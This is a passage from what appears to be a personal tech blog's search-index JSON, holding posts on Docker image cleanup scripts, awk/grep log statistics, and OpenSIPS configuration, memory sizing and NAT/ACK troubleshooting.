\u0026#34;Exited\u0026#34; | awk \u0026#39;{print $1 }\u0026#39; | xargs docker rm 批量删除带有 none 字段的镜像 $3 一般就是取出每一行的镜像 id 字段\n# 方案1: 根据镜像id删除镜像 docker images| grep none |awk \u0026#39;{print $3 }\u0026#39;|xargs docker rmi # 方案2: 根据镜像名删除镜像 docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi 方案 1,根据镜像 ID 删除镜像时,有些镜像虽然镜像名不同,但是镜像 ID 都是相同的,这时候往往会删除失败。所以根据镜像名删除镜像的效果会更好。\n删除镜像定时任务脚本 #!/bin/bash # create by wangduanduan # when current free disk less than max free disk, you can remove docker images # GREEN=\u0026#39;\\033[0;32m\u0026#39; RED=\u0026#39;\\033[0;31m\u0026#39; NC=\u0026#39;\\033[0m\u0026#39; max_free_disk=5 # 5G. 
when current free disk less than max free disk, remove docker images current_free_disk=`df -lh | grep centos-root | awk \u0026#39;{print strtonum($4)}\u0026#39;` df -lh echo \u0026#34;max_free_disk: $max_free_disk G\u0026#34; echo -e \u0026#34;current_free_disk: ${GREEN} $current_free_disk G ${NC}\u0026#34; if [ $current_free_disk -lt $max_free_disk ] then echo -e \u0026#34;${RED} need to clean up docker images ${NC}\u0026#34; docker images | grep none | awk \u0026#39;{print $3 }\u0026#39; | xargs docker rmi docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi else echo -e \u0026#34;${GREEN}no need clean${NC}\u0026#34; fi 注意事项 为了加快打包的速度,一般不要太频繁的删除镜像。因为老的镜像中的某些不改变的层,可以作为新的镜像的缓存,从而大大加快构建的速度。\n","permalink":"https://wdd.js.org/shell/docker-clean-tips/","summary":"使用 jenkins 作为打包的工具,主机上的磁盘空间总是慢慢被占满,直到 jenkins 无法运行。本文从几个方面来清理 docker 垃圾。\n批量删除已经退出的容器 docker ps -a | grep \u0026#34;Exited\u0026#34; | awk \u0026#39;{print $1 }\u0026#39; | xargs docker rm 批量删除带有 none 字段的镜像 $3 一般就是取出每一行的镜像 id 字段\n# 方案1: 根据镜像id删除镜像 docker images| grep none |awk \u0026#39;{print $3 }\u0026#39;|xargs docker rmi # 方案2: 根据镜像名删除镜像 docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi 方案 1,根据镜像 ID 删除镜像时,有些镜像虽然镜像名不同,但是镜像 ID 都是相同的,这时候往往会删除失败。所以根据镜像名删除镜像的效果会更好。\n删除镜像定时任务脚本 #!/bin/bash # create by wangduanduan # when current free disk less than max free disk, you can remove docker images # GREEN=\u0026#39;\\033[0;32m\u0026#39; RED=\u0026#39;\\033[0;31m\u0026#39; NC=\u0026#39;\\033[0m\u0026#39; max_free_disk=5 # 5G.","title":"Docker镜像批量清理脚本"},{"content":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; 
type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列日志列数比较少或者要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分隔符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk按列提取。最好用的方式是用 grep 的正则提取。好像 grep 不支持捕获分组,所以只能提取出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA\nE 表示使用正则 o 表示只显示匹配到的内容 \u0026gt; grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBB\u0026#34; cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBJ\u0026#34; 统计 对输出的关键词进行统计,并按照升序或者降序排列。将关键词按照列或者按照正则提取出来之后,首先要进行sort排序, 然后再进行uniq去重。不进行排序就直接去重,统计的值就不准确。因为 uniq 去重只能去除连续的相同字符串。不是连续的字符串,则会统计多次。下面例子:非连续的 cause:\u0026ldquo;AAA\u0026rdquo;,没有被合并在一起计数\n// bad grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | uniq -c 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; // good AAA 被正确统计了 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort | uniq -c 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 对统计值排序 sort 默认的排序是按照字典排序, 可以使用-n 参数让其按照数值大小排序。\nn 按照数值排序 r 取反。sort 按照数值排序时,默认是升序,如果想要结果降序,那么需要-r -k -k 可以指定按照某列的数值顺序排序,如-k1,1(指定第一列), -k2,2(指定第二列)。如果不指定-k 参数,那么一般默认第一列。 // 升序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -n 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 2 cause:\u0026#34;AAA\u0026#34; // 降序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; 
test.log | sort |uniq -c | sort -nr 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; ","permalink":"https://wdd.js.org/shell/log-ana/","summary":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列日志列数比较少或者要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分隔符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk按列提取。最好用的方式是用 grep 的正则提取。好像 grep 不支持捕获分组,所以只能提取出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA","title":"awk、grep、cut、sort、uniq简单命令玩转日志分析与统计"},{"content":"if语句中的真和假值 假值\n负数: -1, -2, -3, -4 null: hdr(not_exist) 然而这个not_exist头并不存在 \u0026ldquo;\u0026rdquo;: 空字符串 0 真值:\n非空字符串: \u0026ldquo;acb\u0026rdquo; 正数: 1,2,3 ","permalink":"https://wdd.js.org/opensips/ch5/condition/","summary":"if语句中的真和假值 假值\n负数: -1, -2, -3, -4 null: hdr(not_exist) 然而这个not_exist头并不存在 \u0026ldquo;\u0026rdquo;: 空字符串 0 真值:\n非空字符串: \u0026ldquo;acb\u0026rdquo; 正数: 1,2,3 ","title":"条件语句特点"},{"content":" 将opensips.cfg文件中的log_stderror的值改为yes, 
让出错直接输出到标准错误流上,然后opensips start 如果第一步还是没有日志输出,则opensips -f opensips.cfg ","permalink":"https://wdd.js.org/opensips/ch7/without-log/","summary":" 将opensips.cfg文件中的log_stderror的值改为yes, 让出错直接输出到标准错误流上,然后opensips start 如果第一步还是没有日志输出,则opensips -f opensips.cfg ","title":"opensips启动失败没有任何报错日志"},{"content":"虚拟化 问题:\n操作系统如何虚拟化? 虚拟化有什么好处? 操作系统向下控制硬件,向上提供API给应用程序调用。 系统的资源是有限的,应用程序都需要资源才能正常运行,所以操作系统也要负责资源的分配和协调。通常计算机有以下的资源。\ncpu 内存 磁盘 网络 有些资源可以轮流使用,而有些资源只能被独占使用。\n","permalink":"https://wdd.js.org/posts/2019/08/ym77uc/","summary":"虚拟化 问题:\n操作系统如何虚拟化? 虚拟化有什么好处? 操作系统向下控制硬件,向上提供API给应用程序调用。 系统的资源是有限的,应用程序都需要资源才能正常运行,所以操作系统也要负责资源的分配和协调。通常计算机有以下的资源。\ncpu 内存 磁盘 网络 有些资源可以轮流使用,而有些资源只能被独占使用。","title":"【笔记】操作系统:虚拟化 并发 持久化"},{"content":" 处理问题的关键在于收集数据,基于数据找出触发条件。\n1. 处理步骤 收集信息并记录:包括日志,截图,抓包,客户反馈等等。注意:原始数据非常重要,如果不记录下来,有可能再也无法去重现。 分析数据:注意:分析数据不要有提前的结果倾向,否则只会找有利于该倾向的证据。 给出报告和建议,以及解决方案,并记录存档 2. 概率维度 问题出现的概率,是一个非常重要的指标,需要提前明确\n必然出现:在某个条件下,问题必然出现 注意:必然出现的问题,也可能是小范围内的必然,放到大范围内,就不是必然出现。 偶然出现:问题出现有一定的概率性 注意:问题偶然出现也并不一定说明问题是偶然的,有可能因为没有找到唯一确定的触发条件,导致问题看起来是偶然的。 3. 特征维度 时间特征:集中于某一段时间产生 地理特征:集中于某一片区域产生 人群特征:集中于某几个人产生 设备特征:集中于某些电脑或者客户端 ","permalink":"https://wdd.js.org/posts/2019/08/vqergg/","summary":" 处理问题的关键在于收集数据,基于数据找出触发条件。\n1. 处理步骤 收集信息并记录:包括日志,截图,抓包,客户反馈等等。注意:原始数据非常重要,如果不记录下来,有可能再也无法去重现。 分析数据:注意:分析数据不要有提前的结果倾向,否则只会找有利于该倾向的证据。 给出报告和建议,以及解决方案,并记录存档 2. 概率维度 问题出现的概率,是一个非常重要的指标,需要提前明确\n必然出现:在某个条件下,问题必然出现 注意:必然出现的问题,也可能是小范围内的必然,放到大范围内,就不是必然出现。 偶然出现:问题出现有一定的概率性 注意:问题偶然出现也并不一定说明问题是偶然的,有可能因为没有找到唯一确定的触发条件,导致问题看起来是偶然的。 3. 特征维度 时间特征:集中于某一段时间产生 地理特征:集中于某一片区域产生 人群特征:集中于某几个人产生 设备特征:集中于某些电脑或者客户端 ","title":"问题排查方法论"},{"content":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nRunning OpenSIPS with the right memory configuration is a very important task when developing and maintaining your VoIP service, because it has a direct effect over the scale of your platform, the customers you support, as well as the services you offer. 
Setting the limit to a low value might make OpenSIPS run out of memory during high volume of traffic, or during complex scenarios, while setting a big value might lead to wasted resources.\n内存太小会导致OOM, 内存太大又会浪费\nUnfortunately picking this limit is not something that can be easily determined by a magic formula. The reason is that memory consumption is often influenced by a lot of external factors, like calling scenarios, traffic patterns, provisioned data, interactions with other external components (like AAA or DB servers), etc. Therefore, the only way to properly dimension the memory OpenSIPS is allowed to use is by monitoring memory usage, understanding the memory footprint and tuning this value accordingly. This article provides a few tips to achieve this goal.\n首先监控opensips的内存使用,然后根据监控的值调整合适的内存大小\nOpenSIPS内部的内存使用 opensips是个多进程程序并使用两种内存模型\n私有内存: 进程独占的内存,往往比较小 共享内存: opensips模块使用的内存,往往比较大 To understand the way OpenSIPS uses the available memory, we have to point out that OpenSIPS is a multi-process application that uses two types of memory: private and shared. Each process has its own private memory space and uses it to store local data, that does not need to be shared with other processes (i.e. parsing data). Most of the time the amount of private memory used is small, and usually fits into the default value of 2MB per process. Nevertheless understanding the way private memory is used is also necessary in order to properly dimension your platform’s memory. On the other hand, shared memory is a big memory pool that is shared among all processes. This is the memory used by OpenSIPS modules to store data used at run-time, and in most of the cases, the default value of 16MB is not enough. As I stated earlier, it is impossible to pick a “magic” value for this limit, mostly because there are a lot of considerations that affect it. The data stored in the shared memory can be classified in two categories:\n流量数据:1. 注册相关的数据;2. 
呼叫相关的数据,tm和dialog 配置数据:数据库缓存数据\nTraffic data – data generated by your customers: registration data, managed by the usrloc module, is directly linked to the number of customers registered into the platform; call data, managed by the tm and dialog modules, is related to the number of simultaneous calls done through the platform. Provisioning data – data cached from the database, used to implement the platform’s logic. The amount of memory used by each of these categories may vary according to the services you offer, your customer base and their traffic.\n监控内存使用 有两种方式监控内存\nOpensips CP,这个工具比较直观,但是安装比较复杂,一般不使用 通过opensips的fifo指令去获取内存。这个比较方便,可以做成crontab, 然后周期性的写入到influxdb。 There are two ways to monitor OpenSIPS memory statistics:\nfrom OpenSIPS CP Web GUI, using the statistics interface (Image 1) from cli using the opensipsctl tool: opensipsctl fifo get_statistics shmem: shmem:total_size:: 268435456 shmem:used_size:: 124220488 shmem:real_used_size:: 170203488 shmem:max_used_size:: 196065104 shmem:free_size:: 98231968 shmem:fragments:: 474863 From both you can observe 6 values:\ntotal_size: the total amount of memory provisioned used_size: the amount of memory required to store the data real_used_size: the total amount of memory required to store data and metadata max_used_size: the maximum amount of memory used since OpenSIPS started free_size: the amount of free memory fragments: the number of fragments When monitoring memory usage, the most important statistics are the max_used_size, because it indicates the minimum value OpenSIPS needs to support the traffic it has handled so far, and the real_used_size, because it indicates the memory used at a specific moment. 
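As a sketch of the fifo-based approach mentioned above (a cron job feeding a time-series store such as InfluxDB), the counters can be parsed into a single usage gauge. The sample text below is the captured output from this article, standing in for a live opensipsctl fifo get_statistics shmem: call:

```shell
#!/bin/sh
# Sample fifo output captured above; in a real deployment it would come from:
#   stats=$(opensipsctl fifo get_statistics shmem:)
stats='shmem:total_size:: 268435456
shmem:real_used_size:: 170203488
shmem:max_used_size:: 196065104'

# Extract one counter by name; "::" is part of the fifo output format.
get_stat() {
  printf '%s\n' "$stats" | awk -F':: ' -v key="$1" '$1 == ("shmem:" key) {print $2}'
}

total=$(get_stat total_size)
real=$(get_stat real_used_size)

# Report shared-memory usage as a percentage; a cron job could push this
# value to InfluxDB or any other time-series store.
echo "shmem usage: $(( real * 100 / total ))%"
```

With the sample numbers this reports a 63% usage, i.e. real_used_size over total_size.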
We will use these metrics further on.\n理解内存使用 In order to have a better understanding about the memory used, we will take as an example a very specific platform: an outbound PSTN gateway, that is designed to support 500 CPS (calls per second) from customers and dispatch them to approximately 100K prefixes, cached by the drouting module. You can see the platform’s topology in this picture:\nTo figure out what happens in the scenario Image 1 presents, we will extract the real_used_size, max_used_size and active_dialogs statistics:\nAs you can observe, at the beginning of the chart, the memory usage was low, close to 0. That is most likely OpenSIPS startup. Then, it grows quickly until around 60MB. That is OpenSIPS loading the 100K of prefixes into the drouting module cache. Next, as we can see in the active_dialogs statistic, traffic comes in in batches. Therefore OpenSIPS memory usage increases gradually, until around 170MB and stabilizes with the call-flow. After a while, the dialog numbers start to decrease, and the memory is again gradually released, until it ends at the idle memory of 60MB used by the drouting cache. Taking a closer look at the charts, you will notice two awkward things in the second half of the period:\ndialog占用的内存并不是呼叫结束后立即释放,而是由计时器去延时周期性的按批次去释放 SIP事务也不是会马上释放,而是会等待去耗尽网络中所有的重传消息\nopensips的很多模块往往需要一次性的把数据库中的数据加载到内存中。而在模块reload的时候,内存中会同时存在两份数据。直到新的数据完全加载完毕后,老的数据占用的内存才会释放,而在此之前,老的数据仍旧驻留在内存中,用来处理呼叫。所以在模块reload的时候,也是往往内存出现峰值的时候。 老的数据被释放之后,峰值会很快回落。\nEven though dialogs become significantly less, shared memory usage is still high. That is because dialogs are not immediately deleted from OpenSIPS memory, but on a timer job that deletes them in bulk batches from the database (increased DB performance). Also, SIP transactions are not deleted immediately after they complete, but stored for a while to absorb re-transmissions (according to RFC 3261 requirements). 
Even if there are no high amounts of dialogs coming in, there is a big spike of memory usage, which also changes the max_used_size statistic. The reason for this spike is a drouting module cache reload, over the MI (Management Interface): opensipsctl fifo dr_reload The reason for this spike is that during cache reload, OpenSIPS stores in memory two sets of data: the old one and the new one. The old set is used to route calls until the new set is fully loaded. After that, the memory for the old set is released, and the new set is used further on. Although this algorithm is used to increase the routing performance, it requires a large amount of memory during reload, usually doubling the memory used for provisioning. Following the article till now, you would say that by looking at the memory statistics and correlating traffic with memory usage it can be fairly easy to understand how OpenSIPS uses memory and what are the components that use more. Unfortunately that is not always true, because sometimes you might not have the entire history of the events, or the events happen simultaneously, and you cannot figure out why. Therefore you might end up in a situation where you are using a large amount of memory, but cannot point out why. This makes scaling rather impossible (for both customers and provisioning rules), because you will not be able to estimate how components spread the memory among them. That is why in OpenSIPS 2.2 we added a more granular memory support, that allows you to view the memory used by each module (or group of modules). 
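Once per-group statistics are available, estimating how the groups split the pool becomes simple arithmetic. A small sketch, using the sample real_used readings quoted later in this article against the 268435456-byte pool from the earlier shmem output (both values are illustrative):

```shell
#!/bin/sh
# Illustrative values: total pool size and per-group real_used readings,
# as sampled elsewhere in this article. In practice they would come from:
#   opensipsctl fifo get_statistics shmem: shmem_group_traffic: shmem_group_provision:
total=268435456
traffic_real=86677612
provision_real=55182144

# Express each group's share of the shared memory pool.
echo "traffic:   $(( traffic_real * 100 / total ))% of shared memory"
echo "provision: $(( provision_real * 100 / total ))% of shared memory"
```

This kind of breakdown is exactly what makes dimensioning tractable: the traffic share scales with calls and registrations, while the provision share stays roughly constant (and doubles briefly during a cache reload).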
Memory usage in OpenSIPS 2.2 In order to enable granular memory support, you need to follow these steps:\ngenerate statistics files by running: # make generate-mem-stats 2\u0026gt; /dev/null compile OpenSIPS with extra shared memory support, by running: # make menuconfig -\u0026gt; Configure compile options -\u0026gt; Configure compile flags -\u0026gt; SHM_EXTRA_STATS # make all configure the groups in OpenSIPS configuration file: mem-group = \u0026#34;traffic\u0026#34;: \u0026#34;tm\u0026#34; \u0026#34;dialog\u0026#34; mem-group = \u0026#34;provision\u0026#34;: \u0026#34;drouting\u0026#34; restart OpenSIPS and follow the steps from the previous sections. Checking the statistics during peak time you will get something like this:\n# opensipsctl fifo get_statistics shmem_group_traffic: shmem_group_provision: shmem_group_traffic:fragments:: 153618 shmem_group_traffic:memory_used:: 85448608 shmem_group_traffic:real_used:: 86677612 shmem_group_provision:fragments:: 245614 shmem_group_provision:memory_used:: 53217232 shmem_group_provision:real_used:: 55182144 Checking the traffic statistics will show you exactly how much memory OpenSIPS uses for calls, while checking the provision statistics will show you the memory used by the drouting module. The rest of memory is used by other modules or by the core. If you want to track those down too, group them in a new mem-group.\nDimensioning OpenSIPS memory As you have noticed throughout this article, dimensioning OpenSIPS for a specific number of clients or provisioning data is not an easy task and requires a deep understanding of both customer traffic patterns and provisioning data, as well as OpenSIPS internals. 
We hope that using the tips provided in this article will help you have a better understanding of your platform, how memory resources are used by OpenSIPS, and how to dimension your VoIP platform to the desired scale.\n","permalink":"https://wdd.js.org/opensips/blog/memory-usage/","summary":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nRunning OpenSIPS with the right memory configuration is a very important task when developing and maintaining your VoIP service, because it has a direct effect over the scale of your platform, the customers you support, as well as the services you offer. Setting the limit to a low value might make OpenSIPS run out of memory during high volume of traffic, or during complex scenarios, while setting a big value might lead to wasted resources.","title":"理解并测量OpenSIPS的内存资源"},{"content":"We all experienced calls getting self disconnected after 5-10 seconds – usually disconnected by the callee side via a BYE request – but a BYE which was not triggered by the party behind the phone, but by the SIP stack/layer itself.This is one of the most common issues we get in SIP and one of the most annoying in the same time. But why it happens ?\nGetting to the missing ACK Such a decision to auto-terminate the call (beyond the end-user will and control) indicates an error in the SIP call setup. And because the call was somehow partially established (as both end-points were able to exchange media), we need to focus on the signalling that takes place after the 200 OK reply (when the call is accepted by the callee). So, what do we have between the 200 OK reply and the full call setup ? 
Well, it is the ACK requests – the caller acknowledgement for the received 200 OK. And according to RFC 3261, any SIP device not receiving the ACK to its final 2xx reply has to disconnect the call by issuing a standard BYE request. So, whenever you experience such 10 seconds disconnected calls, the first thing to do is a SIP capture/trace and to check if the callee end-device is actually getting an ACK. It is very, very important to check for ACK at the level of the callee end-device, and not at the level of caller or intermediary SIP proxies – the ACK may get lost anywhere on the path from caller to callee.\nTracing the lost ACK In order to understand how and where the ACK gets lost, we need first to understand how the ACK is routed from caller to the callee’s end-device. Without getting into all the details, the ACK is routed back to callee based on the Record-Route and Contact headers received into the 200 OK reply. So, if the ACK is mis-routed, it is mainly because of wrong information in the 200 OK. The Record-Route headers (in the 200 OK) are less to blame, as they are inserted by the visited proxies and not changed by anyone else. Assuming that you do not have some really special scenarios with SIP proxies behind NATs, we can simply discard the possibility of having faulty Record-Routes. So, the primary suspect is the Contact header in the 200 OK – this header is inserted by the callee’s end-device and it can be altered by any proxy in the middle – so there are many opportunities to get corrupted. And this mainly happens due to wrong handling of NAT presence on end-user side – yes, that’s it, a NATed callee device.\nCommon scenarios No NAT handling If the proxy does not properly handle a NATed callee device, it will propagate into the 200 OK reply the private IP of the callee. And of course, this IP will be unusable when it comes to routing back the ACK to the callee – the proxy will have the “impossible” mission to route to a private IP :). 
So, the ACK will get lost and the call will get disconnected.\nIf that is the case, with OpenSIPS, you will have to review your logic in the onreply route and perform fix_nated_contact() for the 200 OK, if the callee is known as NATed.\nThe correct handling and flow has to be like this:\nExcessive NAT handling While handling NATed end-points is good, you have to be careful not to overdo it. If you see a private IP in the Contact header you should not automatically replace it with the source IP of the SIP packet. Or you should not do it for any incoming reply (like “let’s do it all the time, just to be sure”).\nIn more complex scenarios where a call may visit multiple SIP proxies, the proxies may lose valuable routing information by doing excessive NAT traversal handling. Like in the scenario below, ProxyA is overdoing it, by applying the NAT traversal logic also for calls coming from a proxy (ProxyB) and not only for replies coming from an end-point. By doing this, the IP coordinates of the callee will be lost from the Contact header, as ProxyA has no direct visibility to the callee (in terms of IP).\nIn such a case, with OpenSIPS, you will have to review your logic in the onreply route and to be sure you perform fix_nated_contact() for the 200 OK only if the reply comes from an end-point and not from another proxy.\nConclusions SIP is complicated and you have to pay attention to all the details, if you want to get it to work. Focusing only on routing the INVITE requests is not sufficient. If you come across disconnected calls:\nget a SIP capture/trace and see if the ACK gets to the callee end-point if not, check the Contact header in the 200 OK – it must point all the time to the callee end-point (a public IP) if not, check the NAT traversal logic you have in the onreply routes – be sure you do the Contact fixing only when it is needed. 
Shortly, be moderate, not too few and not too much …when it comes to NAT handling ","permalink":"https://wdd.js.org/opensips/blog/miss-ack/","summary":"We all experienced calls getting self disconnected after 5-10 seconds – usually disconnected by the callee side via a BYE request – but a BYE which was not triggered by the party behind the phone, but by the SIP stack/layer itself. This is one of the most common issues we get in SIP and one of the most annoying at the same time. But why does it happen?\nGetting to the missing ACK Such a decision to auto-terminate the call (beyond the end-user will and control) indicates an error in the SIP call setup.","title":"Troubleshooting missing ACK in SIP"},{"content":"What makes OpenSIPS such an attractive and powerful SIP solution is its high level of programmability, thanks to its C-like configuration script. But once you get into the “programming” area, you will automatically need tools and skills for troubleshooting. So here are some tips and tools you can use in OpenSIPS for “debugging” your configuration script.\nControlling the script logging The easiest way to troubleshoot your script is of course by using the xlog() core function and print your own messages. Still the internal OpenSIPS logs (generated by the OpenSIPS code) do provide a lot of information about what OpenSIPS is doing. The challenge with the logging is to control the amount and content of messages you want to log. Otherwise you will end up with huge piles of logs, completely impossible to read and follow. By using the $log_level script variable you can dynamically change the logging level (to make it more or less verbose) from the script level. You can do this only for parts of the script:\nlog_level= -1 # errors only ….. { …… $log_level = 4; # set the debug level of the current process to DEBUG uac_replace_from(….); $log_level = NULL; # reset the log level of the current process to its default level ……. 
}\nor only for certain messages, based on source IP (you can use the permissions module for a more dynamic approach, controlled via DB)\nif ($si==\u0026#34;11.22.33.44\u0026#34;) $log_level = 4;\nor some parts of the message (you can use the dialplan module for the dynamic approach):\nif ($rU==\u0026#34;911\u0026#34;) $log_level = 4;\nIMPORTANT: do not forget to reset the log level back to default before terminating the script, otherwise that log level will be used by the current process for all the future messages it will handle.\nTracing the script execution Still, using the xlog() core function may not be the best option as it implies a high script pollution and many script changes (with restarts, of course). So, a better alternative is the script_trace() core function. Once you enabled the script tracing, OpenSIPS will start logging its steps through the script execution, printing each function that is called and its line in the script file. This script tracing is really helpful when you want to understand or troubleshoot your script execution, answering questions like “why does my script not get to this route” or “why is the script function not called” or “I do not understand how the SIP message flows through my script”… and many other similar problems. The script_trace() function can help even more by allowing you to trace the value of certain variables (or parts of the message) during the script execution. Like “I do not understand where in the script my RURI is changed”. 
So you simply attach to the function a log line (with variables, of course) that will be evaluated and printed for each function in the script:\nscript_trace( 1, \u0026#34;$rm from $si, ruri=$ru\u0026#34;, \u0026#34;me\u0026#34;);\nwill produce:\n[line 578][me][module consume_credentials] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 581][me][core setsflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 583][me][assign equal] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 592][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 585][me][module is_avp_set] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 589][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 586][me][module is_method] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 587][me][module trace_dialog] -\u0026gt; (INVITE 127.0.0.1 , ruri=sip:tester@opensips.org) [line 590][me][core setflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org)\nAgain, you can enable the script tracing only for some cases (on demand). 
For example I want to trace only calls from a certain subscriber, so I can use the dialplan module and create in DB rules to match the subscribers I’m interested in tracing:\nif ( dp_translate(\u0026#34;1\u0026#34;,\u0026#34;$fU/$var(foo)\u0026#34;) )\ncaller must be traced according to dialplan 1 script_trace( 1, \u0026#34;$rm from $si, ruri=$ru\u0026#34;, \u0026#34;me\u0026#34;);\nBenchmarking the script Assuming that you get to a point where you managed to troubleshoot and fix your script in terms of the execution flow, you now may be interested in troubleshooting the script execution from the time perspective – how much time OpenSIPS takes to execute certain parts of the script. This is a mandatory step if you want to perform a performance analysis of your OpenSIPS setup. The benchmark module will help you to measure the time OpenSIPS took to execute different parts of the script:\nbm_start_timer(\u0026#34;lookup-timer\u0026#34;); lookup(\u0026#34;location\u0026#34;); bm_log_timer(\u0026#34;lookup-timer\u0026#34;);\nAn interesting capability of the module is to provide information about the current usage, but also aggregated information from the past, like how many times a certain timer was used or what was the total time spent in a timer (see the full provided information). And even more, such information can be pulled via the Management Interface via the bm_poll_results command, for external usage:\nopensipsctl fifo bm_poll_results register-timer 3/40/12/14/13.333333 9/204/12/97/22.666667 lookup-timer 3/21/7/7/7.000000 9/98/7/41/10.888889\nIdentifying script bottlenecks But still you need to find the weak points of your script in terms of time to process. Or the bottlenecks of your script. OpenSIPS provides a very useful mechanism for this – the time thresholds. There are different thresholds, for different operations, that can be set in OpenSIPS core and modules. 
Whenever the execution takes longer than configured, OpenSIPS will report it to the log, together with additional useful information (such as operation details or script backtrace):\nexec_msg_threshold (core) – the maximum number of microseconds the processing of a SIP msg is expected to last. This is very useful to identify the “slow” functions in your overall script; exec_dns_threshold (core) – the maximum number of microseconds a DNS query is expected to last. This is very useful to identify the “slow” DNS queries in your routing (covering also SRV, NAPTR queries too); tcp_threshold (core) – maximum number of microseconds sending a TCP request is expected to last. This is useful to identify the “slow” TCP connections (in terms of sending data). Note that this option will cover all TCP-based transports, like TCP plain, TLS, WS, WSS, BIN or HEP. exec_query_threshold (db_mysql module) – maximum number of microseconds for running a mysql query. This is useful to identify the “slow” query you may have. Note that this option covers all the mysql queries you may have in OpenSIPS – from script level or internally triggered by modules. A similar option is also available in the db_postgres module. An example for the output triggered by the exec_msg_threshold:\nopensips[17835]: WARNING:core:log_expiry: threshold exceeded : msg processing took too long – 223788 us. Source : BYE sip:………. 
